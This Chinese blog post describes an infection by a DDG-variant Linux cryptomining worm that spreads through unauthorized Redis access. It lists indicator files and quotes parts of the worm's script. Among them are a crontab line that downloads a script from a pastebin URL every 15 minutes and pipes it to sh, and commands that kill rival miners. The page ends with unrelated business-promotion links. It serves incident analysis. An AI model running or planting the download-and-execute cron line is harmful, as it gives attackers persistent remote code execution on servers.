2024年服务器被挖矿怎么办?(2019年2月21日 Linux下DDG变种挖矿病毒在全国范围内大规模爆发)
2024-02-26
王柯团队
前几天,我的服务器ps命令和sh等多个命令不起作用,引起了我的注意,阿里云一直提示cpu过载,而且一直警告我6379端口被攻击,我一直没当回事,ps、top 命令好像被篡改了,明明 cpu 很高,但就是找不到高 cpu 的进程。病毒目录程序也没找到于是提交工单后踩知道服务器中了病毒。
病毒事件介绍
2019年2月21日 Linux下DDG变种挖矿病毒在全国范围内大规模爆发,默安科技应急响应中心经过对样本分析发现,该病毒变种通过Redis未授权访问漏洞进行突破植入,然后使用本地密钥登录.ssh/known_hosts文件中的服务器进行横向传播,造成大量服务器负载增高,无法正常提供业务。
病毒执行的恶意脚本通过以下地址进行储存和更新:
恶意病毒特征如下:
恶意文件列表
使用LD_PRELOAD进行劫持
/etc/ld.so.preload
/usr/local/lib/libioset.so
恶意二进制文件
/tmp/watchdogs
/usr/sbin/watchdogs
/tmp/ksoftirqds
计划任务脚本
/etc/cron.d/tomcat
/etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/rc.d/init.d/watchdogs
病毒脚本分析如下:
每15分钟从pastebin上下载经过base64编码的该脚本自身并执行:
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh" | crontab -
关闭其他可能存在的挖矿木马:
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9
微信扫码上方二维码,可领取2025年最新互联网创业项目!
项目收款截图
推荐阅读:
2024年最火的小本生意有哪些(一年四季不愁销路的生意)
2024年注册shopee要多少钱?需要哪些其他费用?
2024年自媒体发视频怎么赚钱?赚钱方式有哪些?
2024年中消协点名,特斯拉登上年度维权第一
2024年最火的儿童生意(吸引小孩子的生意项目)
2024年做tiktok需要投资多少钱?有哪些费用?
2024年做啥生意投资小利润大(2024年做啥生意投资小利润大)
2024年中国将推动跨境电商等新业态新模式加快发展,培育外贸新动能
2024年做淘宝店需要投入多少钱(做淘宝店需要具备什么)
2024年做跨境电商需要哪些条件?要做好哪几方面?
2024年种植1亩羊肚菌成本(羊肚菌一亩的成本多少)
2024年中国半导体进口,两年来首次下跌
2024年做亚马逊要设置包邮吗?亚马逊自发货包装要求
2024年做电商如何自己出单号(自发货打单全流程)
2024年做跨境电商不会英语怎么办?新手如何运营?